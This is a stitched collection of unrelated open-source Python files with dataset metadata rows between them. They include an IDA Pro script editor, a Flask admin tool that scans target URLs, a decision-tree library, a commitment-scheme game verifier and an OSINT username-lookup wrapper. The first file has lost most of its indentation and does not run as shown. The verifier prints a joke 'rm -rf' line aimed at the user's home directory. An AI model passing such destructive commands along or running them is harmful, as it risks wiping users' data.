self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action9)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action10)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action21)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action11)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action12)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action14)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action15)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action16)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action17)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action18)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action19)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action20)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action22)
self.skrift = QFont()
self.skrift.setFamily('Consolas')
self.skrift.setFixedPitch(True)
self.skrift.setPointSize(12)
self.codebox.setFont(self.skrift)
#python style
self.lexer = QsciLexerPython(self.codebox)
self.lexer.setFont(self.skrift)
self.lexer.setEolFill(True)
#api test not working
api = Qsci.QsciAPIs(self.lexer)
API_FILE = dn+'\\Python.api'
API_FILE2 = dn+'\\idc.api'
API_FILE3 = dn+'\\idaapi.api'
api.load(API_FILE)
api.load(API_FILE2)
api.load(API_FILE3)
api.prepare()
self.codebox.setAutoCompletionThreshold(0)
self.codebox.setAutoCompletionThreshold(6)
self.codebox.setAutoCompletionThreshold(8)
self.codebox.setAutoCompletionSource(Qsci.QsciScintilla.AcsAPIs)
self.lexer.setDefaultFont(self.skrift)
self.codebox.setLexer(self.lexer)
self.codebox.SendScintilla(QsciScintilla.SCI_STYLESETFONT, 1, 'Consolas')
#line numbers
fontmetrics = QFontMetrics(self.skrift)
self.codebox.setMarginsFont(self.skrift)
self.codebox.setMarginWidth(0, fontmetrics.width("00000") + 6)
self.codebox.setTabWidth(4)
#brace
self.codebox.setBraceMatching(QsciScintilla.SloppyBraceMatch)
#auto line tab =4
self.codebox.setAutoIndent(True)
#scroolbar
self.codebox.SendScintilla(QsciScintilla.SCI_SETHSCROLLBAR, 1)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(_translate("MainWindow", "Ida Pro Python Script Editor", None))
self.toolBar.setWindowTitle(_translate("MainWindow", "toolBar", None))
def plugin_make(self):
Wizard.show()
def sendgrapped(self):
print "hello"
helloclass = Ui_Wizard()
self.bsout = self.codebox.text()
helloclass.script_textEdit.setText(self.bsout)
    def hubba(self):
        # Unused debug hook left over from development.
        pass
        #print str(self.codebox.text())
def udder(self):
self.codebox.zoomIn()
def odder(self):
self.codebox.zoomOut()
def newfile(self):
self.codebox.clear()
def open(self):
self.path = QtCore.QFileInfo(self.filename).path()
        # Get filename and show only Python files
(self.filename, _) = \
QtWidgets.QFileDialog.getOpenFileName(self.vindu,
'Open File', self.path,
'Python Files (*.py *.pyc *.pyw)', '')
if self.filename:
with open(self.filename, 'r') as self.file:
self.codebox.setText(self.file.read())
os.chdir(str(self.path))
def savefile(self):
self.path = QtCore.QFileInfo(self.filename).path()
(self.filename, _) = \
QtWidgets.QFileDialog.getSaveFileName(self.vindu, 'Save as'
, self.path, 'Python Files (*.py *.pyc *.pyw)')
if self.filename:
self.savetext(self.filename)
os.chdir(str(self.path))
def savetext(self, fileName):
textout = self.codebox.text()
file = QtCore.QFile(fileName)
if file.open(QtCore.QIODevice.WriteOnly):
QtCore.QTextStream(file) << textout
else:
QtWidgets.QMessageBox.information(self.vindu,
'Unable to open file', file.errorString())
os.chdir(str(self.path))
def runto(self):
self.path = QtCore.QFileInfo(self.filename).path()
g = globals()
os.chdir(str(self.path))
script = str(self.codebox.text())
try:
os.chdir(str(self.path))
os.path.join(os.path.expanduser('~'), os.path.expandvars(str(self.path)))
sys.path.insert(0, str(self.path))
exec (script, g)
except Exception as e:
print e.__doc__
print e.message
else:
pass
#exec (script, g)
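    # Editor's note (hedged sketch, not original code): `runto` above boils
    # down to the following pattern, with `script` being the buffer text and
    # `path` its directory:
    #
    #   sys.path.insert(0, path)   # make sibling modules importable
    #   os.chdir(path)             # relative paths resolve next to the script
    #   exec (script, globals())   # run inside the editor process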
def runtoprob(self):
try:
            self.path = QtCore.QFileInfo(self.filename).path()
g = globals()
os.chdir(str(self.path))
script = str(self.codebox.text())
import cProfile
cProfile.run(script)
except Exception as e:
print e.__doc__
print e.message
        else:
            pass
    def DisableCode(self):
self.codebox.setAutoCompletionSource(Qsci.QsciScintilla.AcsNone)
    def EnableCode(self):
self.codebox.setAutoCompletionSource(Qsci.QsciScintilla.AcsAPIs)
def nofoldingl(self):
self.codebox.setFolding(QsciScintilla.NoFoldStyle)
def Circledfold(self):
self.codebox.setFolding(QsciScintilla.CircledTreeFoldStyle)
def plainfold(self):
self.codebox.setFolding(QsciScintilla.PlainFoldStyle)
def webopen(self):
import webbrowser
webbrowser.open('https://www.hex-rays.com/')
def sdkopen(self):
import webbrowser
webbrowser.open('https://www.hex-rays.com/products/ida/support/idapython_docs/')
def gitopen(self):
import webbrowser
webbrowser.open('https://github.com/idapython/src/tree/build-1.7.2')
def Author(self):
import webbrowser
webbrowser.open('https://github.com/techbliss')
def font_choice(self):
self.lbl = self.lexer
font, ok = QtWidgets.QFontDialog.getFont()
if ok:
self.lbl.setFont(font)
def on_margin_clicked(self, nmargin, nline, modifiers):
# Toggle marker for the line the margin was clicked on
if self.codebox.markersAtLine(nline) != 0:
self.codebox.markerDelete(nline, self.ARROW_MARKER_NUM)
else:
self.codebox.markerAdd(nline, self.ARROW_MARKER_NUM)
class MyWindow(QtWidgets.QMainWindow):
    '''
    Ask the user before quitting so we can change back to the root dir.
    '''
def closeEvent(self, event):
reply = QMessageBox.question(self, 'Exit',
"Are you sure to quit?", QMessageBox.Yes |
QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
# print dn
os.chdir(dn)
# print dn
#os.chdir('../..')
# print dn
print '''
###################################################
# Author Storm Shadow #
# #
# Follow me on twitter #
# @zadow28 #
###################################################
# Ida pro python Editor #
###################################################
'''
event.accept()
os.chdir(dn)
else:
event.ignore()
os.chdir(dn)
from PyQt5 import Qsci
if __name__ == '__main__':
import sys
Wizard = QtWidgets.QWizard()
#Wizard = QtWidgets.QWizard()
#app = QtWidgets.QApplication.instance() # enable for usage outside
#if not app: # enable for usage outside
# app = QtWidgets.QApplication([]) # enable for usage outside
MainWindow = MyWindow()
ui = Ui_MainWindow()
messageformForm = QtWidgets.QWidget()
ui2 = Ui_Wizard()
ui3 = Ui_messageformForm()
ui3.setupUi1(messageformForm)
MainWindow.resize(1000, 600)
MainWindow.show()
# app.exec_()
| unlicense | -4,438,855,489,847,117,000 | 42.621421 | 338 | 0.644755 | false |
dorneanu/crudappify | apps/orgapp/app/admin/views.py | 1 | 6660 | from flask import Blueprint
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext import admin
from flask.ext.admin.contrib import sqla
from flask.ext.admin import Admin, BaseView, expose
from flask.ext.admin.base import MenuLink
from flask.ext.admin.babel import gettext, ngettext, lazy_gettext
from flask.ext.admin.form import Select2TagsWidget, Select2Field, Select2TagsField, rules
from flask.ext.admin.actions import action
from wtforms import validators, fields
from app import app
from app.database import db_session
from app.models import AppType, App, AppBundle, Target, Organization, Department, Connection, Header, Tag
from app.models import conn_tags_table
class AppTypeAdmin(sqla.ModelView):
list_template = "list.html"
column_display_pk = False
form_columns= ['desc']
class AppAdmin(sqla.ModelView):
list_template = "list.html"
column_display_pk = False
# Allow only pre-defined values
form_overrides = dict(severity=fields.SelectField)
form_args = dict(
severity = dict(
choices = [('High', 'High'), ('Medium', 'Medium'), ('Low', 'Low')]
))
form_columns = [
'app_name', 'desc', 'app_type', 'bundle',
'version', 'environment', 'platform',
'department', 'contact',
'date_added',
'status', 'last_scan', 'reported_to_dpt', 'open_issues',
'severity', 'tags', 'url', 'comments'
]
# Add here list of columns where to search
column_searchable_list = ('desc', 'url', 'version', 'environment', 'platform', 'contact', AppBundle.name, Tag.name)
# Define here filters
column_filters = ('desc', 'app_name', 'department', 'app_type', 'url', 'app_id', 'version', 'environment', 'platform', 'date_added', 'tags', 'severity')
# Define which fields should be preloaded by Ajax
form_ajax_refs = {
'tags': {
'fields': (Tag.name,)
},
'app_type': {
'fields': (AppType.desc,)
},
'department': {
'fields': (Department.desc,)
},
'bundle': {
'fields': (AppBundle.name, AppBundle.desc,)
}
}
# Group fields
form_create_rules = [
rules.FieldSet(('app_name', 'desc', 'app_type', 'bundle', 'url', 'severity', 'tags', 'comments'), 'Application'),
rules.FieldSet(('version', 'environment', 'platform', 'status'), 'Technical details'),
rules.FieldSet(('contact', 'department'), 'Contact'),
rules.FieldSet(('open_issues', 'last_scan', 'reported_to_dpt'), 'Audit details'),
]
# Use same rule set for editing pages
form_edit_rules = form_create_rules
def __init__(self, session):
# Just call parent class with predefined model
super(AppAdmin, self).__init__(App, session)
class AppBundleAdmin(sqla.ModelView):
list_template = "list.html"
class TargetAdmin(sqla.ModelView):
list_template = "list.html"
column_display_pk = False
# Allow only pre-defined values
form_overrides = dict(priority=fields.SelectField)
form_args = dict(
priority = dict(
choices = [('High', 'High'), ('Medium', 'Medium'), ('Low', 'Low')]
))
column_filters = ('scheme', 'user', 'password', 'netloc', 'port', 'path', 'params', 'query', 'fragment', 'priority', 'comments')
column_searchable_list = ('scheme', 'user', 'password', 'netloc', 'path', 'params', 'query', 'fragment', 'priority', 'comments', Tag.name)
form_ajax_refs = {
'tags': {
'fields': (Tag.name,)
}
}
# Group fields
form_create_rules = [
rules.FieldSet(('scheme', 'user', 'password', 'netloc', 'port', 'path', 'query', 'fragment'), 'URL Info'),
rules.FieldSet(('priority', 'tags', 'comments', 'connection'), 'Audit details')
]
# Use same rule set for editing pages
form_edit_rules = form_create_rules
@expose("/export")
def action_export(self):
return '<p>Not implemented yet</p>'
@action('scan', 'Scan')
def action_scan(self, ids):
import json
from utils.connection import send_request
t = []
data = []
for id in ids:
headers = []
target = db_session.query(Target).filter_by(id=id).one()
t.append(target.to_string())
# Connect to target
response = send_request(target.to_string(), t)
# Collect headers
for r in response.headers:
headers.append({'header': r, 'value': response.headers[r]})
data.append({'id': id, 'data': headers})
return json.dumps(data, indent=2)
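        # Editor's note: illustrative shape of the JSON built above, with
        # assumed header values that are not actual output of this project:
        # [
        #   {"id": 1, "data": [{"header": "Server", "value": "nginx"},
        #                      {"header": "Content-Type", "value": "text/html"}]}
        # ]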
def __init__(self, session):
super(TargetAdmin, self).__init__(Target, session)
class OrgAdmin(sqla.ModelView):
# list_template = "list.html"
column_display_pk = True
class DepartmentAdmin(sqla.ModelView):
list_template = "list.html"
column_display_pk = False
form_columns = ['org', 'desc', 'contact']
column_searchable_list = ('desc', Organization.desc)
column_filters = ('desc', 'org')
form_args = dict(
text=dict(label='Big Text', validators=[validators.required()])
)
form_ajax_refs = {
'org': {
'fields': (Organization.desc,)
}
}
def __init__(self, session):
# Just call parent class with predefined model
super(DepartmentAdmin, self).__init__(Department, session)
class ConnectionAdmin(sqla.ModelView):
list_template = "list.html"
column_display_pk = False
form_columns = ['conn_type', 'url', 'port', 'answer', 'redirect', 'tags']
column_searchable_list = ('conn_type', 'url', 'answer', 'redirect', 'ip', Tag.name)
column_filters = ('conn_type', 'url', 'port', 'answer', 'redirect', 'ip', Tag.name)
# Define which fields should be preloaded by Ajax
form_ajax_refs = {
'tags': {
'fields': (Tag.name,)
}
}
class HeaderAdmin(sqla.ModelView):
list_template = "list.html"
form_columns = ['conn_id', 'header', 'value']
# Add admin functionality
admin = Admin(app, name="Admin App Survey", url="/admin", base_template="layout-admin.html", template_mode="bootstrap3")
# Add models views
admin.add_view(AppTypeAdmin(AppType, db_session))
admin.add_view(sqla.ModelView(Tag, db_session))
admin.add_view(AppAdmin(db_session))
admin.add_view(AppBundleAdmin(AppBundle, db_session))
admin.add_view(ConnectionAdmin(Connection, db_session))
admin.add_view(HeaderAdmin(Header, db_session))
admin.add_view(OrgAdmin(Organization, db_session))
admin.add_view(DepartmentAdmin(db_session))
admin.add_view(TargetAdmin(db_session))
| mit | -3,902,489,461,993,599,500 | 31.487805 | 156 | 0.618018 | false |
seppemans/businesstimedelta | businesstimedelta/businesstimedelta.py | 1 | 2641 | import datetime
import pytz
def localize_unlocalized_dt(dt):
"""Turn naive datetime objects into UTC.
Don't do anything if the datetime object is aware.
https://docs.python.org/3/library/datetime.html#datetime.timezone
"""
if dt.tzinfo is not None and dt.tzinfo.utcoffset(dt) is not None:
return dt
return pytz.utc.localize(dt)
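# Editor's note: a hedged example of the helper above; the values are
# illustrative assumptions, not taken from the original source.
#
#   naive = datetime.datetime(2020, 1, 6, 9, 0)
#   localize_unlocalized_dt(naive)           # -> 2020-01-06 09:00:00+00:00
#   aware = pytz.timezone('US/Eastern').localize(naive)
#   localize_unlocalized_dt(aware) is aware  # -> True (aware values pass through)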
class BusinessTimeDelta(object):
def __init__(self, rule, hours=0, seconds=0, timedelta=None):
self.rule = rule
if timedelta:
self.timedelta = timedelta
else:
self.timedelta = datetime.timedelta(
seconds=seconds,
hours=hours)
def __repr__(self):
return '<BusinessTimeDelta %s hours %s seconds>' % (self.hours, self.seconds)
def __eq__(self, other):
return self.timedelta == other.timedelta
def __add__(self, other):
if isinstance(other, BusinessTimeDelta) and other.rule == self.rule:
return BusinessTimeDelta(self.rule, timedelta=self.timedelta + other.timedelta)
elif isinstance(other, datetime.datetime):
dt = localize_unlocalized_dt(other)
td_left = self.timedelta
while True:
period_start, period_end = self.rule.next(dt)
period_delta = period_end - period_start
# If we ran out of timedelta, return
if period_delta >= td_left:
return period_start + td_left
td_left -= period_delta
dt = period_end
raise NotImplementedError
def __radd__(self, other):
return self.__add__(other)
def __sub__(self, other):
if isinstance(other, BusinessTimeDelta) and other.rule == self.rule:
return BusinessTimeDelta(self.rule, timedelta=self.timedelta - other.timedelta)
elif isinstance(other, datetime.datetime):
dt = localize_unlocalized_dt(other)
td_left = self.timedelta
while True:
period_start, period_end = self.rule.previous(dt)
period_delta = period_end - period_start
# If we ran out of timedelta, return
if period_delta >= td_left:
return period_end - td_left
td_left -= period_delta
                dt = period_start
        raise NotImplementedError
def __rsub__(self, other):
return self.__sub__(other)
@property
def hours(self):
return int(self.timedelta.total_seconds() // (60 * 60))
@property
def seconds(self):
return int(self.timedelta.total_seconds() % (60 * 60))
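# Editor's note: hedged usage sketch. It assumes a `rule` object exposing
# next(dt) / previous(dt) -> (period_start, period_end), which is all the
# arithmetic above requires (e.g. a business-hours rule from this package):
#
#   delta = BusinessTimeDelta(rule, hours=16)
#   deadline = datetime.datetime(2020, 1, 6, 9, 0) + delta  # skips off-hours
#   delta.hours, delta.seconds                              # -> (16, 0)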
| mit | 6,038,156,290,826,573,000 | 31.207317 | 91 | 0.581598 | false |
flypy/flypy | flypy/runtime/lowlevel_impls.py | 1 | 1431 | # -*- coding: utf-8 -*-
"""
Low-level implementations of opaque methods.
"""
from __future__ import print_function, division, absolute_import
import string
from flypy.compiler import opaque
from pykit import ir, types as ptypes
def add_impl(opaque_func, name, implementation, restype=None, restype_func=None):
"""
Assign an implementation to an `opaque` function.
Sets up a pykit function and calls `implementation` to produce the
function body.
"""
def impl(py_func, argtypes):
# TODO: do this better
from flypy.compiler import representation_type
ll_argtypes = [representation_type(x) for x in argtypes]
argnames = list(string.ascii_letters[:len(argtypes)])
# Determine return type
if restype_func:
result_type = restype_func(argtypes)
else:
result_type = restype or ll_argtypes[0]
type = ptypes.Function(result_type, tuple(ll_argtypes), False)
func = ir.Function(name, argnames, type)
func.new_block("entry")
b = ir.Builder(func)
b.position_at_beginning(func.startblock)
implementation(b, argtypes, *func.args)
return func
opaque.implement_opaque(opaque_func, impl)
def add_impl_cls(cls, name, implementation, restype=None, restype_func=None):
    """Like `add_impl`, but resolves the opaque function as attribute `name` of `cls`."""
    opaque_func = getattr(cls, name)
add_impl(opaque_func, name, implementation, restype, restype_func)
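# Editor's note: hedged sketch of wiring an implementation through `add_impl`.
# The builder calls are illustrative pseudocode, not verified pykit API, and
# `my_opaque_add` is a hypothetical opaque function:
#
#   def float_add_impl(builder, argtypes, a, b):
#       # emit the body for `a + b`; exact builder method names may differ
#       builder.ret(builder.add(a, b))
#
#   add_impl(my_opaque_add, "my_add", float_add_impl, restype=ptypes.Float64)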
| bsd-2-clause | 8,591,202,777,185,511,000 | 29.446809 | 81 | 0.665968 | false |
dmitru/pines | pines/estimators.py | 1 | 4069 | # coding=utf-8
import numpy as np
from sklearn.base import BaseEstimator, ClassifierMixin, RegressorMixin
from sklearn.utils import check_X_y, check_array
from sklearn.utils.validation import NotFittedError
from pines.tree_builders import TreeType, ProblemType
class DecisionTreeClassifier(BaseEstimator, ClassifierMixin):
def __init__(self, tree_type=TreeType.CART, **kwargs):
"""
        Builds a decision tree for a classification problem.
        Args:
            tree_type (string): One of 'cart' or 'oblivious', default is 'cart'
            **kwargs: arguments to pass to a `TreeBuilder` instance
"""
super(DecisionTreeClassifier, self).__init__()
self.tree_ = None
self.tree_type = tree_type
self._tree_builder_kwargs = kwargs
self._tree_builder_class = TreeType.get_tree_builder(tree_type)
def fit(self, X, y, **kwargs):
X, y = check_X_y(X, y, dtype=np.float64)
data_size, n_features = X.shape
self._n_features = n_features
self._tree_builder = self._tree_builder_class(
problem=ProblemType.CLASSIFICATION,
**self._tree_builder_kwargs
)
self.tree_ = self._tree_builder.build_tree(X, y)
return self
def predict(self, X, check_input=True):
if check_input:
X = self._validate_X_predict(X, check_input=True)
return self.tree_.predict(X)
def _validate_X_predict(self, X, check_input):
"""Validate X whenever one tries to predict, apply, predict_proba"""
if self.tree_ is None:
raise NotFittedError("Estimator not fitted, "
"call `fit` before exploiting the model.")
if check_input:
X = check_array(X, dtype='f')
n_features = X.shape[1]
if self._n_features != n_features:
raise ValueError("Number of features of the model must "
" match the input. Model n_features is %s and "
" input n_features is %s "
% (self._n_features, n_features))
return X
class DecisionTreeRegressor(BaseEstimator, RegressorMixin):
def __init__(self, tree_type=TreeType.CART, **kwargs):
"""
        Builds a decision tree for a regression problem.
        Args:
            tree_type (string): One of 'cart' or 'oblivious', default is 'cart'
            **kwargs: arguments to pass to a `TreeBuilder` instance
"""
super(DecisionTreeRegressor, self).__init__()
self._tree = None
self.tree_type = tree_type
self._tree_builder_kwargs = kwargs
self._tree_builder_class = TreeType.get_tree_builder(tree_type)
def fit(self, X, y, **kwargs):
X, y = check_X_y(X, y, dtype=np.float64)
data_size, n_features = X.shape
self._n_features = n_features
self._tree_builder = self._tree_builder_class(
problem=ProblemType.REGRESSION,
**self._tree_builder_kwargs
)
self._tree = self._tree_builder.build_tree(X, y)
return self
def predict(self, X, check_input=True):
if check_input:
X = self._validate_X_predict(X, check_input=True)
return self._tree.predict(X)
def _validate_X_predict(self, X, check_input):
"""Validate X whenever one tries to predict, apply, predict_proba"""
if self._tree is None:
raise NotFittedError("Estimator not fitted, "
"call `fit` before exploiting the model.")
if check_input:
X = check_array(X, dtype='f')
n_features = X.shape[1]
if self._n_features != n_features:
raise ValueError("Number of features of the model must "
" match the input. Model n_features is %s and "
" input n_features is %s "
% (self._n_features, n_features))
return X
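# Editor's note: hedged end-to-end sketch on synthetic data; it assumes the
# package's tree builders work as wired above and only runs when the module
# is executed directly.
if __name__ == '__main__':
    X_demo = np.random.rand(100, 5)
    y_demo = (X_demo[:, 0] > 0.5).astype(int)
    clf = DecisionTreeClassifier(tree_type=TreeType.CART)
    clf.fit(X_demo, y_demo)
    print(clf.predict(X_demo[:5]))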
| mit | -3,523,422,632,452,845,000 | 35.00885 | 79 | 0.576554 | false |
yeukhon/homework | computer-security/commitment/verifier.py | 1 | 1699 | #!/usr/bin/env python
import sys
import os
from Crypto import Random
from Crypto.Random import random as R
import cPickle as pcl
import hashlib as H
# # # paper-rock-scissors over a line # # #
# 1. wait for init message
# 2. wait for commitment to one of the values
# 3. send random choice in {paper,rock,scissors}
# 4. wait for decommit value
# 5. report results.
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
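# Editor's note: hedged sketch of the committing peer this verifier expects,
# reconstructed from the checks below rather than taken from the original
# repository:
#
#   r = Random.new().read(32)                  # fresh commitment randomness
#   h = H.sha512(); h.update(r); h.update(item)
#   pcl.dump(h.hexdigest(), out)               # step 2: send commitment
#   ...                                        # step 3: receive our item
#   pcl.dump([r, item], out)                   # step 4: decommit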
items = {"paper": 0, "rock": 1, "scissors": 2}
initMessage = pcl.load(sys.stdin)
if initMessage != "hello":
sys.stderr.write("You're supposed to say hello.\n")
sys.exit()
# say hello back.
pcl.dump(initMessage,sys.stdout)
sys.stdout.flush()
# now wait for the committed value
commitment = pcl.load(sys.stdin)
# at this point it is safe to just report our value,
# since we already have theirs.
rnd = R.StrongRandom()
item = dict.keys(items)[rnd.randint(0,len(items)-1)]
pcl.dump(item,sys.stdout)
sys.stdout.flush()
# now read the decommit value
decommit = pcl.load(sys.stdin)
# this will be a list with the randomness first,
# and the committed value second.
theiritem = decommit[1]
# make sure they aren't trying to cheat, and finally
# report the results.
h = H.sha512()
h.update(decommit[0])
h.update(decommit[1])
if h.hexdigest() != commitment:
message = "Cheater! You'll pay for that...\nrm -rf " \
+ os.environ['HOME'] + "\nj/k hahahaha\n"
elif items[item] == items[theiritem]:
    message = "I guess it's a draw.\n"
elif (items[item] + 1) % 3 == items[theiritem]:
message = "You lose. Hahahahaha\n"
else:
message = "You win.\n"
pcl.dump(message,sys.stdout)
sys.stderr.write(message)
sys.stdout.flush()
sys.exit()
| mpl-2.0 | -892,549,920,783,651,600 | 25.546875 | 67 | 0.664509 | false |
i3visio/osrframework | osrframework/wrappers/reddit.py | 1 | 3889 | ################################################################################
#
# Copyright 2015-2020 Félix Brezo and Yaiza Rubio
#
# This program is part of OSRFramework. You can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
################################################################################
__author__ = "Felix Brezo, Yaiza Rubio <[email protected]>"
__version__ = "2.0"
from osrframework.utils.platforms import Platform
class Reddit(Platform):
"""A <Platform> object for Reddit"""
def __init__(self):
self.platformName = "Reddit"
self.tags = ["forum"]
########################
# Defining valid modes #
########################
self.isValidMode = {}
self.isValidMode["phonefy"] = False
self.isValidMode["usufy"] = True
self.isValidMode["searchfy"] = False
######################################
# Search URL for the different modes #
######################################
# Strings with the URL for each and every mode
self.url = {}
#self.url["phonefy"] = "http://anyurl.com//phone/" + "<phonefy>"
self.url["usufy"] = "http://en.reddit.com/user/" + "<usufy>"
#self.url["searchfy"] = "http://anyurl.com/search/" + "<searchfy>"
######################################
# Whether the user needs credentials #
######################################
self.needsCredentials = {}
#self.needsCredentials["phonefy"] = False
self.needsCredentials["usufy"] = False
#self.needsCredentials["searchfy"] = False
#################
# Valid queries #
#################
# Strings that will imply that the query number is not appearing
self.validQuery = {}
# The regular expression '.+' will match any query
#self.validQuery["phonefy"] = ".*"
self.validQuery["usufy"] = ".+"
#self.validQuery["searchfy"] = ".*"
###################
# Not_found clues #
###################
# Strings that will imply that the query number is not appearing
self.notFoundText = {}
#self.notFoundText["phonefy"] = []
self.notFoundText["usufy"] = ["<title>reddit.com: page not found</title>"]
#self.notFoundText["searchfy"] = []
#########################
# Fields to be searched #
#########################
self.fieldsRegExp = {}
# Definition of regular expressions to be searched in phonefy mode
#self.fieldsRegExp["phonefy"] = {}
# Example of fields:
#self.fieldsRegExp["phonefy"]["i3visio.location"] = ""
# Definition of regular expressions to be searched in usufy mode
self.fieldsRegExp["usufy"] = {}
# Example of fields:
#self.fieldsRegExp["usufy"]["i3visio.location"] = ""
# Definition of regular expressions to be searched in searchfy mode
#self.fieldsRegExp["searchfy"] = {}
# Example of fields:
#self.fieldsRegExp["searchfy"]["i3visio.location"] = ""
################
# Fields found #
################
        # This attribute will be fed when running the program.
self.foundFields = {}
| agpl-3.0 | 4,466,890,473,808,879,000 | 37.88 | 82 | 0.523405 | false |
michaupl/materialsapp | cuts/migrations/0002_set_type_on_detail.py | 1 | 4930 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
def forwards(self, orm):
"Write your forwards methods here."
# Note: Don't use "from appname.models import ModelName".
# Use orm.ModelName to refer to models in this application,
# and orm['appname.ModelName'] for models in other applications.
from .. import DETAIL_TYPE
for detail in orm.CutDetail.objects.all():
detail.type = DETAIL_TYPE
detail.save()
def backwards(self, orm):
"Write your backwards methods here."
pass
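        # Editor's note: hedged sketch of a reverse step, if one were wanted;
        # the original intentionally leaves this as a no-op:
        #
        #   for detail in orm.CutDetail.objects.all():
        #       detail.type = ''
        #       detail.save()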
models = {
u'core.category': {
'Meta': {'object_name': 'Category'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['core.Image']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '30'})
},
u'core.detail': {
'Meta': {'object_name': 'Detail'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'caption': ('django.db.models.fields.CharField', [], {'max_length': '2000'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'facts': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'subcategory': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Subcategory']"}),
'title_image': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['core.Image']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '15', 'blank': 'True'}),
'video_url': ('django.db.models.fields.URLField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
u'core.image': {
'Meta': {'object_name': 'Image'},
'alt_text': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'figcaption': ('django.db.models.fields.CharField', [], {'max_length': '150', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('sorl.thumbnail.fields.ImageField', [], {'max_length': '255'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
u'core.subcategory': {
'Meta': {'object_name': 'Subcategory'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'caption': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Category']", 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'})
},
u'cuts.cutdetail': {
'Meta': {'object_name': 'CutDetail', '_ormbases': [u'core.Detail']},
u'detail_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['core.Detail']", 'unique': 'True', 'primary_key': 'True'})
},
u'cuts.cutsubcategory': {
'Meta': {'object_name': 'CutSubcategory', '_ormbases': [u'core.Subcategory']},
u'subcategory_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['core.Subcategory']", 'unique': 'True', 'primary_key': 'True'})
}
}
complete_apps = ['cuts']
symmetrical = True
| apache-2.0 | 7,196,076,092,126,287,000 | 63.868421 | 194 | 0.559432 | false |
influence-usa/python-opencivicdata-django | opencivicdata/models/base.py | 1 | 3359 | import re
import uuid
from django.db import models
from django.core.validators import RegexValidator
from jsonfield import JSONField
from uuidfield import UUIDField
from .. import common
class OCDIDField(models.CharField):
def __init__(self, *args, **kwargs):
self.ocd_type = kwargs.pop('ocd_type')
if self.ocd_type != 'jurisdiction':
kwargs['default'] = lambda: 'ocd-{}/{}'.format(self.ocd_type, uuid.uuid4())
# len('ocd-') + len(ocd_type) + len('/') + len(uuid)
# = 4 + len(ocd_type) + 1 + 36
# = len(ocd_type) + 41
kwargs['max_length'] = 41 + len(self.ocd_type)
regex = '^ocd-' + self.ocd_type + '/[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}$'
else:
kwargs['max_length'] = 300
regex = common.JURISDICTION_ID_REGEX
kwargs['primary_key'] = True
# get pattern property if it exists, otherwise just return the object (hopefully a string)
msg = 'ID must match ' + getattr(regex, 'pattern', regex)
